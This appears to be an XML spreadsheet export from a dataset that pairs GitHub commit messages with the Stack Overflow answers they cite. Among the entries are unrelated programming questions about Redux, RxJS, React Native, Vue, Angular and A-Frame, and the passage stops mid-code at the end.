&lt;li&gt;âœ… Laravel Blade Snippets extension&lt;/li&gt;
&lt;li&gt;âœ… Set &lt;code&gt;*.blade.php&lt;/code&gt; as html in &lt;code&gt;settings.json&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use Command + P to search files directly (ok, that's good..)&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/1K0FzKs3.gif" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/1K0FzKs3.gif" alt="in the gif we see the src of an image using the laravel asset. {{ asset('/assets/images/banner/home-2.png')}} and it is clicked with cmd+click, but this file is not tracked and a file creation pop up is opened by vscode." /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As mentioned, the expectation was to open a new tab in the editor with a preview of the file or code, if applicable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C314</t>
  </si>
  <si>
    <t>make the Redux Provider the top-level component
Follows their guidelines, and makes this debugging possible:
https://stackoverflow.com/a/44318447/358804</t>
  </si>
  <si>
    <t>How to view redux store on any website, with no code changes
Update Nov 2019
The react devtools have changed since my original answer. The new
components
tab in chrome's devtools still has the data, but you may have to search a little bit more.
open chrome devTools
select react devtool's
Components
tab
click on the top-most node and look in right-hand column for
store
to be shown
repeat step 3 down the tree until you find the
store
(for me it was the 4th level)
Now you can follow the steps below with
$r.props.store.getState()
Original Answer
If you have react developer tools running you can use
$r.store.getState();
with
no changes to your codebase
.
Note:
You have to open the react devtool in your developer tools window first to make this work, otherwise you will get a
$r is not defined
error
open developer tools
click the React tab
ensure the provider node (or topmost node) is selected
then type
$r.store.getState();
or
$r.store.dispatch({type:"MY_ACTION"})
into your console</t>
  </si>
  <si>
    <t xml:space="preserve">My organization is getting ready to implement a new system, which is a asp.net application.  The application will have a large queue of offline work that is initiated by the website.  This queue will hold different types of activity, ideally in XML messages.  Think of things like email notifications, scheduled tasks, etc.
In the past, the organization would likely have used MSMQ to accomplish this task.  However, they consider MSMQ to be old school (and I partly agree with them), so we are going to do an architectural review to determine the "best" solution.
In my mind, there are a few potential choices:
 1. Stick with a new implementation on the latest version of MSMQ - not ideal, but a known product.
 2. Use Windows Workflow Foundation, which I've heard from a few other developers that have used this for this type of thing.
 3. Develop a custom database solution.
Am I missing any obvious solutions?  This ideally will be a Microsoft product, but really just needs to work in a Microsoft centric shop.
I'm concerned about the following:
 1. Ease of implementation and maintenance
 2. A solution which will be around for awhile
 3. Able to handle a good volume of rows, with medium sized XML data in them
 4. Absolutely reliable queue system, with quick updating (multiple utility processes will likely be grabbing records out of the queue to process them).
</t>
  </si>
  <si>
    <t>C315</t>
  </si>
  <si>
    <t>Update UserListComponent subscribe
We use a pipe here that helps us manage the subscription and behaves appropriately when the component is destroyed. Much of the work done in this commit is modeled after a suggestion in this StackOverflow answer: https://stackoverflow.com/questions/38008334/angular-rxjs-when-should-i-unsubscribe-from-subscription#:~:text=In%20most%20cases%20we%20will,error()%20messages%20are%20published</t>
  </si>
  <si>
    <t>TL;DR: For this question there are two kinds of Observables - finite value and infinite value.
http Observables produce finite (1) values and something like a DOM event listener Observable produces infinite values.
If you manually call subscribe (not using async pipe), then unsubscribe from infinite Observables.
Don't worry about finite ones, RxJs will take care of them.
Sources:
I tracked down an answer from Rob Wormald in Angular's Gitter here.
He states (I reorganized for clarity and emphasis is mine):
if its a single-value-sequence (like an http request) the manual cleanup is unnecessary (assuming you subscribe in the controller manually)
i should say "if its a sequence that completes" (of which single value sequences, a la http, are one)
if its an infinite sequence, you should unsubscribe which the async pipe does for you
Also he mentions in this YouTube video on Observables that "they clean up after themselves..." in the context of Observables that complete (like Promises, which always complete because they are always producing one value and ending - we never worried about unsubscribing from Promises to make sure they clean up XHR event listeners, right?)
Also in the Rangle guide to Angular 2 it reads
In most cases we will not need to explicitly call the unsubscribe method unless we want to cancel early or our Observable has a longer lifespan than our subscription. The default behavior of Observable operators is to dispose of the subscription as soon as .complete() or .error() messages are published. Keep in mind that RxJS was designed to be used in a "fire and forget" fashion most of the time.
When does the phrase "our Observable has a longer lifespan than our subscription" apply?
It applies when a subscription is created inside a component which is destroyed before (or not 'long' before) the Observable completes.
I read this as meaning if we subscribe to an http request or an Observable that emits 10 values and our component is destroyed before that http request returns or the 10 values have been emitted, we are still OK!
When the request does return or the 10th value is finally emitted the Observable will complete and all resources will be cleaned up.
If we look at this example from the same Rangle guide we can see that the subscription to route.params does require an unsubscribe() because we don't know when those params will stop changing (emitting new values).
The component could be destroyed by navigating away in which case the route params will likely still be changing (they could technically change until the app ends) and the resources allocated in subscription would still be allocated because there hasn't been a completion.
In this video from NgEurope Rob Wormald also says you do not need to unsubscribe from Router Observables. He also mentions the http service and ActivatedRoute.params in this video from November 2016.
The Angular tutorial, the Routing chapter now states the following:
The Router manages the observables it provides and localizes the subscriptions. The subscriptions are cleaned up when the component is destroyed, protecting against memory leaks, so we don't need to unsubscribe from the route params Observable.
Here's a discussion on the GitHub Issues for the Angular docs regarding Router Observables where Ward Bell mentions that clarification for all of this is in the works.
I spoke with Ward Bell about this question at NGConf (I even showed him this answer which he said was correct) but he told me the docs team for Angular had a solution to this question that is unpublished (though they are working on getting it approved). He also told me I could update my SO answer with the forthcoming official recommendation.
The solution we should all use going forward is to add a private ngUnsubscribe = new Subject&lt;void&gt;(); field to all components that have .subscribe() calls to Observables within their class code.
We then call this.ngUnsubscribe.next(); this.ngUnsubscribe.complete(); in our ngOnDestroy() methods.
The secret sauce (as noted already by @metamaker) is to call takeUntil(this.ngUnsubscribe) before each of our .subscribe() calls which will guarantee all subscriptions will be cleaned up when the component is destroyed.
Example:
import { Component, OnDestroy, OnInit } from '@angular/core';
// RxJs 6.x+ import paths
import { filter, startWith, takeUntil } from 'rxjs/operators';
import { Subject } from 'rxjs';
import { BookService } from '../books.service';
@Component({
    selector: 'app-books',
    templateUrl: './books.component.html'
})
export class BooksComponent implements OnDestroy, OnInit {
    private ngUnsubscribe = new Subject&lt;void&gt;();
    constructor(private booksService: BookService) { }
    ngOnInit() {
        this.booksService.getBooks()
            .pipe(
               startWith([]),
               filter(books =&gt; books.length &gt; 0),
               takeUntil(this.ngUnsubscribe)
            )
            .subscribe(books =&gt; console.log(books));
        this.booksService.getArchivedBooks()
            .pipe(takeUntil(this.ngUnsubscribe))
            .subscribe(archivedBooks =&gt; console.log(archivedBooks));
    }
    ngOnDestroy() {
        this.ngUnsubscribe.next();
        this.ngUnsubscribe.complete();
    }
}
Note: It's important to add the takeUntil operator as the last one to prevent leaks with intermediate Observables in the operator chain.
More recently, in an episode of Adventures in Angular Ben Lesh and Ward Bell discuss the issues around how/when to unsubscribe in a component. The discussion starts at about 1:05:30.
Ward mentions "right now there's an awful takeUntil dance that takes a lot of machinery" and Shai Reznik mentions "Angular handles some of the subscriptions like http and routing".
In response Ben mentions that there are discussions right now to allow Observables to hook into the Angular component lifecycle events and Ward suggests an Observable of lifecycle events that a component could subscribe to as a way of knowing when to complete Observables maintained as component internal state.
That said, we mostly need solutions now so here are some other resources.
A recommendation for the takeUntil() pattern from RxJs core team member Nicholas Jamieson and a TSLint rule to help enforce it: https://ncjamieson.com/avoiding-takeuntil-leaks/
Lightweight npm package that exposes an Observable operator that takes a component instance (this) as a parameter and automatically unsubscribes during ngOnDestroy: https://github.com/NetanelBasal/ngx-take-until-destroy
Another variation of the above with slightly better ergonomics if you are not doing AOT builds (but we should all be doing AOT now): https://github.com/smnbbrv/ngx-rx-collector
Custom directive *ngSubscribe that works like async pipe but creates an embedded view in your template so you can refer to the 'unwrapped' value throughout your template: https://netbasal.com/diy-subscription-handling-directive-in-angular-c8f6e762697f
I mention in a comment to Nicholas' blog that over-use of takeUntil() could be a sign that your component is trying to do too much and that separating your existing components into Feature and Presentational components should be considered. You can then | async the Observable from the Feature component into an Input of the Presentational component, which means no subscriptions are necessary anywhere. Read more about this approach here.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I faced with an error &lt;code&gt;the trait bound soroban_sdk::xdr::ScVal: TryFrom&amp;lt;&amp;amp;core::option::Option&amp;lt;NestedOptionalData&amp;gt;&amp;gt; is not satisfied&lt;/code&gt; when I try to use Option data in custom contract type. Not sure how to fix it. I thought that all things that required for conversion to ScVal should automatically work for contracttype data and seems that it's so because I can use this types as function arguments and save it in storage, but I getting this error when I try to call cargo test
Could you help me to understand why it works like that and how to fix it.
Here is a repo with an example &lt;a href="https://github.com/andrey-lizunov/soroban_option_data" rel="nofollow noreferrer"&gt;https://github.com/andrey-lizunov/soroban_option_data&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C316</t>
  </si>
  <si>
    <t>Issue: Styles not working in nested &lt;Text&gt; components!
facebook/react-native#19754
https://stackoverflow.com/questions/50884639/empty-text-space-in-the-same-line</t>
  </si>
  <si>
    <t>You have to wrap all your
&lt;Text&gt;
components with a
&lt;Text&gt;
!
So we have:
import React, { Component } from 'react';
import { StyleSheet, Text, View } from 'react-native';
export default class App extends Component {
  render() {
    return (
      &lt;View style={styles.container}&gt;
        &lt;Text&gt;
          &lt;Text&gt;Lorem Ipsum is &lt;/Text&gt;
          &lt;Text&gt;{'     '}&lt;/Text&gt;
          &lt;Text&gt;
            dummy text of the printing and typesetting industry. Lorem Ipsum has
            been the industry's standard dummy text ever since the 1500s, when
            an unknown printer took a galley of type and scrambled it to make a
            type specimen book
          &lt;/Text&gt;
        &lt;/Text&gt;
      &lt;/View&gt;
    );
  }
}
const styles = StyleSheet.create({
  container: {
    flex: 1,
    flexDirection: 'row',
    alignItems: 'center',
    justifyContent: 'center',
    padding: 25,
    paddingTop: 20,
    backgroundColor: '#ecf0f1'
  }
});
but the problem is you can't set the
borderBottomWidth
to your
empty
&lt;Text&gt;
!
Solutions
Nesting a
&lt;View&gt;
in the middle of your
&lt;Text&gt;
.
So we have:
import React, { Component } from 'react';
import { StyleSheet, Text, View } from 'react-native';
export default class App extends Component {
  render() {
    return (
      &lt;View style={styles.container}&gt;
        &lt;Text&gt;
          &lt;Text&gt;Lorem Ipsum is &lt;/Text&gt;
          &lt;View style={styles.nestedViewStyle}&gt;
            &lt;Text&gt;{'     '}&lt;/Text&gt;
          &lt;/View&gt;
          &lt;Text&gt;
            dummy text of the printing and typesetting industry. Lorem Ipsum has
            been the industry's standard dummy text ever since the 1500s, when
            an unknown printer took a galley of type and scrambled it to make a
            type specimen book
          &lt;/Text&gt;
        &lt;/Text&gt;
      &lt;/View&gt;
    );
  }
}
const styles = StyleSheet.create({
  container: {
    flex: 1,
    flexDirection: 'row',
    alignItems: 'center',
    justifyContent: 'center',
    padding: 25,
    paddingTop: 20,
    backgroundColor: '#ecf0f1'
  },
  nestedViewStyle: {
    width: 50,
    borderBottomWidth: 1,
    marginVertical: 5
  }
});
but
Nested Views
is iOS only (
Docs
)!
For android, it's some dirty coding but seems to work!
So we have something like this:
import React, { Component } from 'react';
import { StyleSheet, Text, View } from 'react-native';
export default class App extends Component {
  render() {
    return (
      &lt;View style={styles.container}&gt;
        &lt;Text&gt;
          &lt;Text&gt;Lorem Ipsum is &lt;/Text&gt;
          &lt;Text style={{ textDecorationLine: 'underline' }}&gt;
            {'            '}
          &lt;/Text&gt;
          &lt;Text&gt;
            {' '}
            dummy text of the printing and typesetting industry. Lorem Ipsum has
            been the industry's standard dummy text ever since the 1500s, when
            an unknown printer took a galley of type and scrambled it to make a
            type specimen book
          &lt;/Text&gt;
        &lt;/Text&gt;
      &lt;/View&gt;
    );
  }
}
const styles = StyleSheet.create({
  container: {
    flex: 1,
    flexDirection: 'row',
    alignItems: 'center',
    justifyContent: 'center',
    padding: 25,
    paddingTop: 20,
    backgroundColor: '#ecf0f1'
  }
});
It's the way I think we can do it! If anybody has a better solution, I would appreciate writing an answer for this!
UPDATE
I've just created an
issue for this
in the react-native repo!
Update again!
You can use this function:
splitPhrase = (phrase, isTerm = false) =&gt; {
  let words = phrase.split(' ');
  return words.map((i, k) =&gt; {
    return (
      &lt;Text key={k} style={isTerm ? styles.emptyTerm : styles.paragraphs}&gt;
        {' '}
        {i}{' '}
      &lt;/Text&gt;
    );
  });
};</t>
  </si>
  <si>
    <t xml:space="preserve">We have a piece of functionality that is used by several different applications (clients) on the same server. It can best be modeled as a service, has a backend database, and there will only be one version of the functionality and the database in use at any one time.
Until now we have employed simple DLL-reuse, with the functionality, its configuration file, and dependencies deployed everywhere it is used. Because any changes now have to be made several places, this method is painful when creating new versions of the functionality or when new clients want to use it.
We are wondering if there is a better way to do this, and have come up with two possible alternatives.
Put the DLL (and the dependencies) in the GAC. The question is then how to configure the component. As the clients have no interest in the configuration, we are leaning towards storing the config file in a hard-coded path on the server.
Publish the functionality as an internal (REST-based) service. Access to it can be limited to internal clients using the firewall.
As we see it, the pros of #1 seem to be performance and possibly security, whereas #2 can be seen as simpler to set up.
Are we missing anything important here? Has anybody been in a similar situation before and wants to share some insight?
</t>
  </si>
  <si>
    <t>C317</t>
  </si>
  <si>
    <t>show reviews distribution
## Describe your changes
* Add `getReviewsDistribution` utility function: it returns the distribution of reviews by score in a form of a rounded percentage using [_Largest Remainder Method_](https://stackoverflow.com/questions/13483430/how-to-make-rounded-percentages-add-up-to-100).
* Add `ReviewDistribution` component that displays the the reviews distribution by score.
* Some refactorings:</t>
  </si>
  <si>
    <t>Since none of the answers here seem to solve it properly, here's my semi-obfuscated version using
underscorejs
:
function foo(l, target) {
    var off = target - _.reduce(l, function(acc, x) { return acc + Math.round(x) }, 0);
    return _.chain(l).
            sortBy(function(x) { return Math.round(x) - x }).
            map(function(x, i) { return Math.round(x) + (off &gt; i) - (i &gt;= (l.length + off)) }).
            value();
}
foo([13.626332, 47.989636, 9.596008, 28.788024], 100) // =&gt; [48, 29, 14, 9]
foo([16.666, 16.666, 16.666, 16.666, 16.666, 16.666], 100) // =&gt; [17, 17, 17, 17, 16, 16]
foo([33.333, 33.333, 33.333], 100) // =&gt; [34, 33, 33]
foo([33.3, 33.3, 33.3, 0.1], 100) // =&gt; [34, 33, 33, 0]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web form that I am creating that, among other things, has fields that relate to a database elsewhere. When a user types in these fields, after debouncing, the search is conducted with an API call and the returned JSON data is parsed into the suggestions list.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let timeout;
async function SearchEmployees(elementId, suggestionsId) {
    var searchBox = document.getElementById(elementId);
    var suggestionsList = document.getElementById(suggestionsId);
    suggestionsList.innerHTML = '';
    let loadingOption = new Option(&amp;quot;Loading1...&amp;quot;, &amp;quot;Loading2...&amp;quot;);
    suggestionsList.appendChild(loadingOption);
    clearTimeout(timeout);
    timeout = setTimeout(async () =&amp;gt; {
        console.log('searching...');
        const response = await fetch('/API_CALL_REDACTED?searchString=' + searchBox.value, {
            method: 'GET',
            headers: {
                'Content-Type': 'application/json'
            }
        });
        const json = await response.json();
        suggestionsList.innerHTML = '';
        for (let i = 0; i &amp;lt; json.length; i++) {
            suggestionsList.appendChild(new Option(json[i].displayName, json[i].uid));
        }
    }, 1000);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For whatever reason, when I try to display the &amp;quot;Loading...&amp;quot; option in the suggestions list (currently set to different displays and values for debug purposes), nothing appears, but the final output of the search does. I don't fully understand what's going wrong here, but I suspect it's either due to a browser issue or (more likely) the asynchronous nature of the code.&lt;/p&gt;
&lt;p&gt;Here is the code that generates the label and search box:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@(Html.LabelFor(c =&amp;gt; c.BackingObject.BackingField, &amp;quot;Label:&amp;quot;))
@(Html.TextBoxFor(c =&amp;gt; c.BackingObject.BackingField, new { @id = &amp;quot;personBackingField&amp;quot;, @oninput = &amp;quot;SearchEmployees('personBackingField', 'fieldSuggestions')&amp;quot;, @list = &amp;quot;fieldSuggestions&amp;quot; }))
&amp;lt;datalist id=&amp;quot;fieldSuggestions&amp;quot;&amp;gt;&amp;lt;/datalist&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I stop the code in the debugger, this is the data list, but nothing is displayed to the user.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input id=&amp;quot;personBackingField&amp;quot; list=&amp;quot;fieldSuggestions&amp;quot; name=&amp;quot;BackingObject.BackingField&amp;quot; oninput=&amp;quot;SearchEmployees('personBackingField', 'fieldSuggestions')&amp;quot; type=&amp;quot;text&amp;quot; value=&amp;quot;&amp;quot;&amp;gt;
&amp;lt;datalist id=&amp;quot;fieldSuggestions&amp;quot;&amp;gt;&amp;lt;option value=&amp;quot;Loading2...&amp;quot;&amp;gt;Loading1...&amp;lt;/option&amp;gt;&amp;lt;/datalist&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C318</t>
  </si>
  <si>
    <t>update component to ignore chrome autofill
my testing confirms this stack overflow answer that chrome no longer respects "off" to disable autofill https://stackoverflow.com/a/55292734</t>
  </si>
  <si>
    <t>jquery.disable-autofill
Disable Chrome's autofill. Handy for CRUD forms, when you don't want username/password inputs to be autofilled by the browser.
Usage:
&lt;form&gt;
  &lt;input type="input" name="username" autofill="off" autocomplete="off"&gt;
  &lt;input type="password" name="password"  autofill="off" autocomplete="off"&gt;
&lt;/form&gt;
&lt;script src="jquery.disable-autofill.js"&gt;&lt;/script&gt;
&lt;script&gt;
  $('input[autofill="off"]').disableAutofill();
&lt;/script&gt;
https://github.com/biesbjerg/jquery.disable-autofill</t>
  </si>
  <si>
    <t xml:space="preserve">I have started using aspects for parameter validation in our development framework.  It works nicely, and I enjoy not littering the first half of a public method with validation code.
What I am wondering is if anyone has any recommendations with where in the namespace structure you would place parameter validation?  Part of me thinks that since it is top level functionality, it should be in the top-level product namespace - much like the way that System is used in the .NET Framework.  I just worry about having the core assembly bloat with more features like this as it goes further down the line.
As it stands right now, I have them in something like:
[Company].[Product].ParameterValidators
In this example, ParameterValidators is the name of the class (aspect) which contains the functionality.
Apart from this, I would be appreciative if anyone had further recommendations for incorporating aspects into an existing codebase in relation to structural placement.
</t>
  </si>
  <si>
    <t>C319</t>
  </si>
  <si>
    <t>.json added, generatePassword works
https://stackoverflow.com/questions/60192946/adding-value-inside-an-input-react/60193031#60193031
no destructuring in Generator component</t>
  </si>
  <si>
    <t>You're not destructuring the
password
:
const Generator = ({ submitFn, password }) =&gt; {
  // ...
  &lt;input type="text" value={password}&gt;&lt;/input&gt; //here is a problem
}
OR :
const Generator = ({ submitFn, ...props }) =&gt; {
  // ...
  &lt;input type="text" value={props.password}&gt;&lt;/input&gt; //here is a problem
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to write a type that applies the &lt;a href="https://www.npmjs.com/package/pluralize" rel="nofollow noreferrer"&gt;pluralize&lt;/a&gt; library to a string. The purpose of this is to take a list of strings that contains my database tables, and convert them to the pluralized version, as that is how relations are defined in my schema (Ex: Student -&amp;gt; Students).&lt;/p&gt;
&lt;p&gt;I am an utter novice to writing types, and Google AI gave me the naive solution:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type Pluralize&amp;lt;T extends string&amp;gt; = T extends `${infer S}sis`
    ? `${S}ses`
    : T extends `${infer S}y`
    ? `${S}ies`
    : T extends `${infer S}s`
    ? T
    : `${T}s`;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This solution works, but it fails to properly convert words like &amp;quot;day&amp;quot; to &amp;quot;days&amp;quot;, and instead converts it to &amp;quot;daies&amp;quot;. I could in theory add more rules to make it robust, but that seems like reinventing the wheel.&lt;/p&gt;
&lt;p&gt;I want to write a type that, instead of simply replacing the ending, applies a function to the string. I attempted the solution:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pluralize from &amp;quot;pluralize&amp;quot;;
type Pluralize&amp;lt;T extends string&amp;gt; = T extends string ? pluralize(T) : never;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This solution is wrong, but I'm not well-versed in Typescript and I'm not sure how to fix it. Any advice on a direction to go would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C32</t>
  </si>
  <si>
    <t>[buffer-geometry-merger] Fix to work with dynamic elements
The buffer-geometry-merger, as it was, does not work when you inject
(using JavaScript) some components in a DOM subtree, and then apply
it to merge all geometries in the subtree. See details in
https://stackoverflow.com/questions/59110629/a-frame-buffer-geometry-merger-seems-to-shift-entities-in-some-cases/59513236#59513236
This fix bakes the matrixes of the components into the cloned geometries,
so that when they are merged into a single one, it is correctly positioned.
I also change the updating of the world matrixes for all the scene,
to the updating of the world matrixes for the intended subtree.</t>
  </si>
  <si>
    <t>I think I now fully understand what happens, plus I have a substitute for the buffer-geometry-merger component that works both with static and dynamic (JavaScript inserted) entities with BufferGeometry.
The problem, as @piotr-adam-milewski found out, is how matrixes for the different meshes are applied (or not). To make a long story short, I understood the issue when I learned that:
The element in which the buffer-geometry-merger component is inserted has a mesh, this.el.object3D.
All meshes for children of that element are arranged, once they are inserted in its subtree, as children of this.el.object3D. Each of these meshes has a property parent, referencing its parent in this arrangement.
Each of these meshes has both matrix and worldMatrix properties. matrix is the relevant one here: it keeps the "extended position" (position, rotation, scale) of the mesh, relative to its parent. For the record, worldMatrix keeps the extended position absolute (relative to the scene).
Each of these meshes has also a geometry property, with its geometry. Coordinates of this geometry are relative to its extended position.
All of this mean that if we just copy (clone) the geometry of a mesh A, and insert it in its parent B (B is A.parent, it will be displaced, since the matrix of A is no longer applied. So, the correct way of "moving" it to its parent is to "bake" (apply) the A matrix into it:
let geometry = A.geometry.clone();
geometry.applyMatrix(A.parent.matrix);
A.parent.mesh = new THREE.Mesh(geometry);
If we want to "copy" the geometry several levels up in the hierarchy of meshes, we should bake in to it (apply) the matrixes of each of the levels, except for the matrix of the last (topmost) mesh, since that matrix will be applied to the resulting geometry, because it will be attached to the same mesh.
So, the way of merging geometries in all components in a subtree is basicall to find all of them, bake in each of them (apply) their matrixes, and those up to (but not including) the root of the subtree, and them merge all of them together.
This is done by the following A-Frame component (which is a slight modification of buffer-geometry-merger component:
AFRAME.registerComponent('buffer-geometry-merger', {
  schema: {
    preserveOriginal: {default: false}
  },
  init: function () {
    var geometries = [];
    let self = this;
    this.el.object3D.updateMatrixWorld();
    this.el.object3D.traverse(function (mesh) {
      if (mesh.type !== 'Mesh' || mesh.el === self.el) { return; }
      let geometry = mesh.geometry.clone();
      let currentMesh = mesh;
      while (currentMesh !== self.el.object3D) {
        geometry.applyMatrix(currentMesh.parent.matrix);
        currentMesh = currentMesh.parent;
      }
      geometries.push(geometry);
      mesh.parent.remove(mesh);
    });
    const geometry = THREE.BufferGeometryUtils.mergeBufferGeometries(geometries);
    this.mesh = new THREE.Mesh(geometry);
    this.el.setObject3D('mesh', this.mesh);
  }
});
With this, the case in the question seems to work as it should.
Note: I submitted a pull request to the original buffer-geometry-merger component now, intended to fix it following this answer.</t>
  </si>
  <si>
    <t xml:space="preserve">How is your javaScript code organized? Does it follow patterns like MVC, or something else? 
I've been working on a side project for some time now, and the further I get, the more my webpage has turned into a full-featured application. Right now, I'm sticking with [external-link], however, the logic on the page is growing to a point where some organization, or dare I say it, "architecture" is needed. My first approach is "MVC-ish":
The 'model' is a JSON tree that gets extended with helpers
The view is the DOM plus classes that tweak it
The controller is the object where I connect events handling and kick off view or model manipulation
I'm very interested, however, in how other people have built more substantial javaScript apps. I'm not interested in GWT, or other server-oriented approaches... just in the approach of "javaScript + &lt;generic web service-y thingy here&gt;"
Note: earlier I said javaScript "is not really OO, not really functional". This, I think, distracted everyone. Let's put it this way, because javaScript is unique in many ways, and I'm coming from a strongly-typed background, I don't want to force paradigms I know but were developed in very different languages.
</t>
  </si>
  <si>
    <t>C320</t>
  </si>
  <si>
    <t>vue: Convert 'urlize' filter into a method
Filters are removed from Vue 3 and no longer supported, so in order to make the
future Vue 3 migration simpler we are going to convert them into methods, as
recommended [1].
Given those filters could be used by multiple components, we are going to store
them as mixins instead of defining them in specific components, which could lead
to code duplication.
Note that the only places where we were using this 'urlize' Vue filter was
inside an ':inner-html.prop' binding which seems undocumented nowadays and only
works with filters, not with methods [2]. We have replaced it with the `v-html`
built-in directive [3] which does work with methods and will continue to work in
Vue 3.
1: https://v3-migration.vuejs.org/breaking-changes/filters.html
2: https://stackoverflow.com/a/49868526
3: https://vuejs.org/api/built-in-directives.html#v-html</t>
  </si>
  <si>
    <t>For completeness, in Vue 2 you have some options, like:
v-html="$options.filters.FILTERNAME(args)"
or
:inner-html.prop="args | FILTERNAME"
or
v-html="METHODNAME(args)"
, if you create a method.
For Vue 3, filters are no longer supported. So the only options are method (or a computed prop).
More info in the demos below.
Vue 2:
function json(text) {
  // do your magic
  return text.toUpperCase(); // just for demo
}
Vue.filter('json', function (value) {
    return json(value);
})
new Vue({
  el: '#app',
  data: {
    message: 'Hello Vue.js!'
  },
  methods: {
    jsonMethod(v) {
      return json(v); // create a "proxy" to the outer function
    }
  }
})
&lt;script src="https://unpkg.com/vue@2"&gt;&lt;/script&gt;
&lt;div id="app"&gt;
  &lt;p v-html="$options.filters.json(message)"&gt;&lt;/p&gt;
  &lt;p :inner-html.prop="message | json"&gt;&lt;/p&gt;
  &lt;p v-html="jsonMethod(message)"&gt;&lt;/p&gt;
&lt;/div&gt;
Vue 3:
In Vue.js 3
filters are no longer supported
. Therefore the only options left is to use a method or a computed property:
function json(text) {
  // do your magic
  return text.toUpperCase(); // just for demo
}
const { createApp } = Vue
createApp({
  data() {
    return {
      message: 'Hello Vue.js!'
    }
  },
  methods: {
    jsonMethod(v) {
      return json(v); // create a "proxy" to the outer function
    }
  },
  computed: {
    transformedMessage() {
      return json(this.message)
    }
  }
}).mount('#app')
&lt;script src="https://unpkg.com/vue@3/dist/vue.global.js"&gt;&lt;/script&gt;
&lt;div id="app"&gt;
  &lt;p v-html="jsonMethod(message)"&gt;&lt;/p&gt;
  &lt;p v-html="transformedMessage"&gt;&lt;/p&gt;
&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I'm making some changes to a legacy classic ASP application. I've made the changes locally, and now I want to copy the changed files to the server. At the same time, I need to download the Access database, add some fields to some tables, and upload it again. For this reason, I need to be able to stop visitors from modifying the database while this is happening.
My main question is, what is the best way to setup a quick "Down for Maintenance" page that will be shown immediately and no matter which page the visitor requests. The application is already established, so I'd rather an answer that didn't require me to rework the application's architecture.
My second question (maybe this should be a separate question):
Is there a better way to add fields to a db table than to copy it down, modify, and stick it up again? Please forgive if that's a dumb question - I'm new to ASP - new to Windows too.
I only have FTP access to the remote server.
Thanks.
</t>
  </si>
  <si>
    <t>C321</t>
  </si>
  <si>
    <t>Support CodePen in article markdown (#156)
* feat: Create CodePen embed component
* feat: Support `codepen` tag in markdoc
* feat: Use p tag instead of iframe in CodePen
* feat: Support `height` prop in CodePen
* fix: Correct title of CodePen
* feat: Change default height of CodePen embed
* feat: Only require `src` from `codepen` tag
* feat: Change the default tab value of CodePen
* fix: Remove legacy prop in iframe
See https://stackoverflow.com/a/75065655/9744063</t>
  </si>
  <si>
    <t>If allowtransparency, or allowTransparency or anything doesn't work, you still can try with CSS.
iframe {
    background-color: transparent;
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a phone app that can receive incoming call notifications using CallKit, as described in &lt;a href="https://developer.apple.com/documentation/callkit/preparing-your-app-to-be-the-default-calling-app" rel="nofollow noreferrer"&gt;Apple's CallKit documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Added the &lt;code&gt;com.apple.developer.calling-app&lt;/code&gt; entitlement in my &lt;code&gt;.entitlements&lt;/code&gt; file.
Implemented &lt;code&gt;CXProvider&lt;/code&gt; and set up the delegate methods (&lt;code&gt;provider:perform:&lt;/code&gt; and &lt;code&gt;providerDidReset&lt;/code&gt;).
Added &lt;code&gt;UIBackgroundModes&lt;/code&gt; with &lt;code&gt;voip&lt;/code&gt; in &lt;code&gt;Info.plist&lt;/code&gt;.
Configured &lt;code&gt;CXProviderConfiguration&lt;/code&gt; to support phone numbers.&lt;/p&gt;
&lt;p&gt;I expected to receive incoming call notifications when my app was set as the default calling app. However, I am not receiving any notifications when an incoming call arrives.&lt;/p&gt;
&lt;p&gt;How can I properly detect and handle incoming calls in my default calling app?
Is there any additional configuration required for iOS 18.2+?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C322</t>
  </si>
  <si>
    <t>Proxy server for Spring Boot + FormControl in Angular
- reference: https://stackoverflow.com/questions/39661430/angular-2-formcontrolname-inside-component
- possible to Create, Delete and Get all Atomic items</t>
  </si>
  <si>
    <t>You should not be adding
formControlName
attribute to the input field in the template of your custom component. 
You should be adding the
formControlName
on the custom-input element itself as per the best practice.
Here what you can use in your custom-input component is the
controlValueAccessor
interface  to make your custom-input have the value updated whenever there is an event of input field in the template of your custom input  changed or blurred.
It provides a connection (to update values or other needs) between the form control behavior of your custom input and the UI you are providing for that custom form control.
Below is the code of a custom input component in TypeScript.
import { Component, Input, forwardRef, AfterViewInit, trigger, state, animate, transition, style, HostListener, OnChanges, ViewEncapsulation, ViewChild, ElementRef } from '@angular/core';
import { NG_VALUE_ACCESSOR, ControlValueAccessor, FormControl } from '@angular/forms';
export const CUSTOM_INPUT_CONTROL_VALUE_ACCESSOR: any = {
    provide: NG_VALUE_ACCESSOR,
    useExisting: forwardRef(() =&gt; InputComponent),
    multi: true
};
@Component({
  selector: 'inv-input',
  templateUrl:'./input-text.component.html',
    styleUrls: ['./input-text.component.css'],
    encapsulation: ViewEncapsulation.None,
  providers: [CUSTOM_INPUT_CONTROL_VALUE_ACCESSOR],
    animations:[trigger(
        'visibilityChanged',[
            state('true',style({'height':'*','padding-top':'4px'})),
